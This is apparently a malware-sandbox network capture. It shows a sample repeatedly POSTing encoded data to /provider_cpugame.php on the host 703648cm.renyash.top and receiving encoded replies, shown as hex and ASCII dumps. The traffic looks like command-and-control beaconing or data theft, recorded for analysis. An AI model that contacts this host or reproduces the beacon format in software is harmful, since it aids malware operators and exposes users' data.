                                                                                                                      Data Raw: 0e 11 25 56 34 02 3d 0b 33 3c 22 08 29 33 2b 12 24 2c 27 06 2f 23 2e 5d 26 3e 35 5c 2a 3b 32 53 3f 33 25 5f 26 0d 21 52 33 5b 2f 57 32 0e 2b 51 03 10 22 5c 24 3d 07 01 27 3f 3c 1f 30 33 3f 04 21 3d 3b 19 22 55 2d 0c 37 5f 35 1d 25 3e 29 18 2a 07 3d 58 3d 1d 23 05 2a 31 06 07 3e 17 20 52 09 16 25 08 28 3b 37 0c 24 38 0a 1f 2b 03 02 17 25 06 03 18 3d 03 35 0a 3c 10 0a 55 29 11 19 0a 26 23 2a 59 28 29 25 14 25 03 27 09 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V4=3<")3+$,'/#.]&>5\*;2S?3%_&!R3[/W2+Q"\$='?<03?!=;"U-7_5%>)*=X=#*1> R%(;7$8+%=5<U)&#*Y()%%''&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:56.133445024 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:56.540699959 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:57.261365891 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 20 3b 35 0c 30 01 03 56 3c 0d 2f 56 32 01 30 1d 2c 20 03 00 25 3e 17 5c 3c 05 32 50 3d 33 04 01 31 23 3d 53 27 2d 37 52 31 24 2b 51 03 10 22 5f 32 04 22 59 33 2f 06 10 27 55 20 5c 22 10 28 07 21 33 26 1e 21 39 22 0d 24 00 22 09 28 29 2d 59 2a 27 2c 5f 3f 0f 38 05 3d 3d 20 52 09 16 26 1d 29 28 19 0e 24 2b 3f 0c 28 3d 2f 05 25 2b 21 1a 29 3d 04 54 28 2d 2f 0e 29 2f 1a 19 25 20 04 1e 29 5c 26 05 25 2a 23 0a 33 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & ;50V</V20, %>\<2P=31#=S'-7R1$+Q"_2"Y3/'U \"(!3&!9"$"()-Y*',_?8== R&)($+?(=/%+!)=T(-/)/% )\&%*#3&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:57.263299942 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:57.694557905 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:58.432641983 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:56 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 23 15 21 0f 30 01 3e 0b 2b 23 38 0f 24 3c 20 1b 38 0e 04 5e 31 00 31 17 2b 2b 22 53 2a 30 3e 06 31 23 21 11 30 3d 34 0d 32 0e 2b 51 03 10 22 15 24 2d 2d 07 33 01 3c 54 30 0d 38 5c 35 2e 2b 1c 36 0a 39 08 23 29 0f 1f 33 00 26 09 28 39 29 5a 3e 27 23 05 2b 0f 05 15 3d 17 20 52 09 16 25 0d 29 2b 20 54 30 06 06 12 28 04 24 5d 25 06 26 0e 29 03 25 0c 28 3e 3c 55 2b 2c 3c 56 25 56 3d 04 2a 04 2d 19 26 39 3c 19 24 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#!0>+#8$< 8^11++"S*0>1#!0=42+Q"$--3<T08\5.+69#)3&(9)Z>'#+= R%)+ T0($]%&)%(><U+,<V%V=*-&9<$(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:58.439273119 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:58.847507000 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:59.562707901 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 23 3b 2e 56 30 11 21 51 2b 33 27 56 24 3c 23 42 38 0e 26 59 25 58 29 59 3c 15 3e 57 29 1d 32 00 25 20 21 52 33 04 27 56 32 1e 2b 51 03 10 21 05 25 2e 3a 58 24 01 20 52 33 0d 2c 5d 22 10 38 44 21 55 2e 50 20 2a 3a 0b 25 3e 0b 18 28 29 07 13 2a 1a 02 16 3f 21 05 5e 3d 2d 20 52 09 16 26 51 3e 01 38 55 30 38 0e 51 29 2e 20 5f 26 38 21 1b 28 2e 32 1e 28 3e 38 10 3d 3f 38 1a 25 1e 32 58 28 2a 00 04 32 39 3c 19 33 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R#;.V0!Q+3'V$<#B8&Y%X)Y<>W)2% !R3'V2+Q!%.:X$ R3,]"8D!U.P *:%>()*?!^=- R&Q>8U08Q). _&8!(.2(>8=?8%2X(*29<3(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:18:59.563476086 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:59.977632046 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:00.473812103 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:58 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0a 20 28 3e 56 26 3f 25 51 29 23 38 0d 32 01 0e 19 3b 0e 3d 07 31 00 3e 00 2b 28 2e 15 29 0d 04 03 25 1d 07 52 27 2d 2c 0b 25 34 2b 51 03 10 21 00 25 03 03 00 24 06 20 52 33 33 28 16 21 2d 2b 1a 35 1d 31 0f 37 39 25 57 27 3e 29 18 3d 00 2a 01 2b 37 3f 05 3f 31 06 05 3e 2d 20 52 09 16 25 0e 3e 16 34 55 24 5e 24 50 3c 04 3f 05 25 16 07 18 3d 2d 2a 1d 28 58 38 1f 2a 11 30 52 25 1e 29 01 2a 29 3e 07 26 14 38 19 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: & (>V&?%Q)#82;=1>+(.)%R'-,%4+Q!%$ R33(!-+5179%W'>)=*+7??1>- R%>4U$^$P<?%=-*(X8*0R%)*)>&808&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:00.474682093 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:00.881077051 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:01.651535988 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:59 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1f 23 2b 0f 0f 27 11 3d 53 29 33 0a 08 25 3f 3b 43 2c 20 0c 17 31 00 22 00 3f 38 2d 0a 2a 33 2d 5f 26 55 35 57 25 2e 24 0c 25 1e 2b 51 03 10 22 59 25 13 2a 5b 33 01 37 0d 27 33 0d 05 21 2e 0a 43 22 0d 2a 57 23 39 08 0a 30 2d 31 52 3d 00 29 5b 3d 1d 20 5c 2b 31 05 1b 3d 2d 20 52 09 16 25 0c 2a 06 12 57 25 38 23 08 3c 03 20 15 32 16 2d 57 28 2d 32 57 28 00 27 0b 29 01 1d 0a 32 09 32 5c 3e 14 3e 02 32 39 3c 53 24 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %#+'=S)3%?;C, 1"?8-*3-_&U5W%.$%+Q"Y%*[37'3!.C"*W#90-1R=)[= \+1=- R%*W%8#< 2-W(-2W(')22\>>29<S$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:01.652292967 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:02.059591055 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:02.852031946 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 37 15 0b 0c 30 01 03 18 2b 0d 0e 08 26 06 23 44 38 1e 2d 07 25 00 22 07 2b 15 0f 0e 2a 33 29 5f 31 0a 21 1e 30 03 2b 1f 25 24 2b 51 03 10 22 5e 31 04 31 01 27 59 2c 1d 24 55 24 58 36 58 2b 1d 22 1d 2e 56 34 39 3d 56 24 07 3d 52 28 3a 2a 01 3e 1a 27 06 28 31 27 5c 3d 3d 20 52 09 16 25 0c 2a 38 34 1e 25 28 2b 09 28 2d 0a 15 26 06 35 1a 28 3d 2e 1f 2b 07 24 53 2b 3f 34 14 25 0e 35 02 3e 14 0f 16 25 5c 24 14 24 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V70+&#D8-%"+*3)_1!0+%$+Q"^11'Y,$U$X6X+".V49=V$=R(:*>'(1'\== R%*84%(+(-&5(=.+$S+?4%5>%\$$8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:02.853140116 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:03.259530067 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:04.051035881 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 53 37 15 29 0d 30 01 0b 15 29 23 06 0d 32 11 0e 1d 2f 56 35 06 25 10 3a 01 28 5d 2a 56 3e 23 03 58 26 1d 0c 0d 25 2d 09 1d 32 1e 2b 51 03 10 22 5e 25 3d 03 00 33 2c 2f 0a 30 1d 0a 15 35 3d 20 40 21 0d 2e 55 20 17 35 1f 30 3e 2d 18 3d 39 29 5e 2a 34 0e 15 3f 31 06 07 2a 07 20 52 09 16 25 0c 3d 3b 24 1d 30 06 34 12 3f 5b 38 5d 26 01 2d 1a 3e 5b 21 0d 3f 3e 2c 10 3e 01 2b 09 26 30 35 05 2a 5c 36 02 31 3a 2c 57 27 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %S7)0)#2/V5%:(]*V>#X&%-2+Q"^%=3,/05= @!.U 50>-=9)^*4?1* R%=;$04?[8]&->[!?>,>+&05*\61:,W'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:04.054982901 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:04.473906994 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:05.196027040 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:03 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0e 34 2b 3d 0d 24 11 31 52 29 20 2f 57 26 06 3f 0b 2c 0e 2a 5f 31 2e 14 00 2b 5d 3e 1b 29 1d 25 59 31 0a 21 57 27 04 24 0f 26 34 2b 51 03 10 21 07 31 2d 39 02 30 11 2f 0a 26 23 02 15 36 00 34 09 36 23 3d 0c 34 39 3e 0c 25 2e 25 53 2a 17 35 13 3e 37 2f 04 2a 22 33 14 3e 07 20 52 09 16 26 54 2a 16 23 0c 27 01 28 57 3c 2d 30 14 26 3b 31 1a 3d 2e 2a 10 2b 07 20 1d 2a 2f 3c 51 25 56 22 1e 3d 3a 21 5e 24 29 20 57 24 28 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &4+=$1R) /W&?,*_1.+]>)%Y1!W'$&4+Q!1-90/&#646#=49>%.%S*5>7/*"3> R&T*#'(W<-0&;1=.*+ */<Q%V"=:!^$) W$(&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:05.197107077 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:05.603972912 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:06.390378952 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 11 34 02 2d 0c 26 2f 2d 50 2b 33 3b 50 31 3f 28 1a 2c 0e 04 59 25 3e 36 04 3c 15 0c 51 2a 33 2d 5f 32 30 2d 56 33 03 3b 55 31 0e 2b 51 03 10 22 14 32 03 32 13 30 59 3f 0d 33 20 20 5e 36 3d 20 08 21 55 3d 0f 34 07 04 0f 27 00 25 57 29 5f 35 58 3e 1d 28 5e 28 0f 2b 14 29 07 20 52 09 16 26 1c 2a 2b 24 1c 24 3b 38 1c 28 5b 2c 58 31 01 35 51 2a 5b 2a 52 3c 3e 38 56 29 2f 24 53 31 30 3e 10 28 3a 29 14 25 3a 3f 09 24 02 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %4-&/-P+3;P1?(,Y%>6<Q*3-_20-V3;U1+Q"220Y?3 ^6= !U=4'%W)_5X>(^(+) R&*+$$;8([,X15Q*[*R<>8V)/$S10>(:)%:?$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:06.391186953 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:06.797950983 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:07.520291090 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:05 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 55 20 38 2a 55 27 59 39 18 3f 33 2f 51 25 3f 3f 0b 2c 09 2e 15 24 2d 25 5e 2b 3b 32 52 3e 1d 2d 5f 25 33 0f 54 27 3e 34 0f 25 34 2b 51 03 10 22 1b 31 2d 21 02 30 11 30 53 27 23 33 00 22 07 23 1a 22 23 21 0f 34 3a 29 55 27 2e 39 18 3d 07 2d 5e 2a 1a 34 17 28 31 06 05 2a 07 20 52 09 16 25 0e 28 38 28 1e 25 28 37 0f 2b 03 28 5c 31 38 36 0e 29 04 2a 1d 28 58 30 56 3d 59 28 53 25 1e 25 00 29 03 2a 06 32 3a 3c 19 24 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %U 8*U'Y9?3/Q%??,.$-%^+;2R>-_%3T'>4%4+Q"1-!00S'#3"#"#!4:)U'.9=-^*4(1* R%(8(%(7+(\186)*(X0V=Y(S%%)*2:<$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:07.521712065 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:07.928395033 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:08.657363892 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:06 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 52 34 05 00 54 27 11 29 1b 3c 23 2b 50 31 01 2b 40 38 0e 26 15 25 3e 25 59 2a 28 21 08 3e 23 2d 58 25 33 03 56 27 13 0e 0c 25 1e 2b 51 03 10 22 59 31 2e 39 01 30 3c 34 1d 33 30 23 05 36 58 34 08 23 23 2e 56 21 29 25 53 30 2e 26 08 3e 39 25 5e 2b 37 23 03 2b 21 01 58 29 17 20 52 09 16 26 54 29 16 15 09 24 06 20 54 3c 3e 2c 59 31 01 3e 0e 29 3d 21 0f 3c 00 27 0f 29 3c 3f 0f 25 20 25 03 3e 03 26 05 25 04 3c 51 27 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %R4T')<#+P1+@8&%>%Y*(!>#-X%3V'%+Q"Y1.90<430#6X4##.V!)%S0.&>9%^+7#+!X) R&T)$ T<>,Y1>)=!<')<?% %>&%<Q'&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:08.659593105 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:09.084177971 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:09.775857925 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 57 34 28 36 1c 30 59 25 51 28 1d 23 1f 26 2c 23 42 38 30 2a 17 31 3d 2a 01 3f 28 3d 0b 3d 55 2e 03 26 0a 29 56 27 2d 09 54 26 24 2b 51 03 10 22 5d 25 03 2e 13 30 59 3c 1e 26 33 33 00 35 00 27 19 22 30 32 1d 21 29 07 1e 30 3d 3a 09 2a 17 29 1d 2a 34 02 15 3c 32 30 01 3d 2d 20 52 09 16 25 08 28 2b 24 56 24 5e 3b 0f 2b 2d 30 1a 31 3b 3d 1a 3d 2e 2d 0f 28 3e 28 54 3e 3c 3f 0a 32 1e 2e 5d 2a 14 26 03 32 5c 38 50 24 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %W4(60Y%Q(#&,#B80*1=*?(==U.&)V'-T&$+Q"]%.0Y<&335'"02!)0=:*)*4<20=- R%(+$V$^;+-01;==.-(>(T><?2.]*&2\8P$&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:09.776954889 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:10.187144995 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:11.107099056 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 26 0c 23 05 03 0f 24 59 25 53 3f 1d 23 12 25 59 27 09 2c 23 2a 15 32 00 22 04 3f 02 2e 56 3e 33 0f 1d 24 30 21 56 27 3e 2c 0d 32 0e 2b 51 03 10 21 00 26 3e 21 02 24 2f 34 53 24 23 23 01 22 2e 2f 19 36 33 2a 1e 20 07 2d 1d 24 3d 31 53 2a 29 3e 03 3e 27 28 17 2a 22 2b 5f 3e 2d 20 52 09 16 26 1f 29 3b 34 1d 24 3b 37 0f 29 2d 28 59 31 38 03 53 2a 3d 21 0d 2b 00 33 0a 2b 2c 28 56 32 0e 2e 5c 3e 14 2d 16 25 14 3c 52 27 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: &#$Y%S?#%Y',#*2"?.V>3$0!V'>,2+Q!&>!$/4S$##"./63* -$=1S*)>>'(*"+_>- R&);4$;7)-(Y18S*=!+3+,(V2.\>-%<R'8&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:11.110819101 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:11.519325018 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:11.978599072 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:10 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 1c 20 15 04 57 24 06 21 1b 28 1d 05 12 26 01 02 18 3b 23 32 1a 26 3e 32 04 28 5d 2e 1a 3e 0a 2d 1d 32 33 35 52 30 2d 28 0a 31 24 2b 51 03 10 22 16 31 3e 26 13 30 3f 09 0a 30 33 0e 58 22 2e 0a 45 36 20 3e 57 20 17 00 0e 33 07 25 51 3e 00 2e 02 29 34 33 05 28 08 2b 58 3e 17 20 52 09 16 25 0c 2a 38 38 13 33 38 38 1c 3c 3e 24 5f 25 06 07 52 28 2d 21 0e 2b 2d 23 0d 2a 59 38 52 26 0e 2a 13 3d 03 35 5a 32 14 06 1b 30 12 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: % W$!(&;#2&>2(].>-235R0-(1$+Q"1>&0?03X".E6 >W 3%Q>.)43(+X> R%*88388<>$_%R(-!+-#*Y8R&*=5Z20&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:11.980199099 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:12.386504889 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:13.112950087 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 0e 11 25 56 34 3b 00 54 24 2f 2a 0a 3c 0d 0e 0c 24 2f 23 06 2e 20 35 05 25 3e 1b 58 3f 05 00 56 29 0d 3a 00 32 0a 3d 53 25 2d 27 1f 25 24 2b 51 03 10 22 5c 32 03 3a 58 24 2f 34 1f 33 23 3c 14 36 3d 24 41 22 0a 22 1e 37 17 0f 55 24 58 21 50 3d 29 08 06 2a 0a 37 02 2b 57 2c 07 29 17 20 52 09 16 25 09 2a 06 3c 1e 27 06 34 1f 28 3e 24 15 25 38 35 1a 3d 3e 35 0e 3f 2e 0d 0b 29 2c 20 52 32 30 32 5c 2a 3a 0b 5f 32 14 3c 50 30 38 26 50 23 03 2d 55 0d 3d 56 57
                                                                                                                      Data Ascii: %V4;T$/*<$/#. 5%>X?V):2=S%-'%$+Q"\2:X$/43#<6=$A""7U$X!P=)*7+W,) R%*<'4(>$%85=>5?.), R202\*:_2<P08&P#-U=VW
                                                                                                                      Dec 20, 2024 21:19:13.116998911 CET288OUTPOST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:13.523823977 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:14.246970892 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:12 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
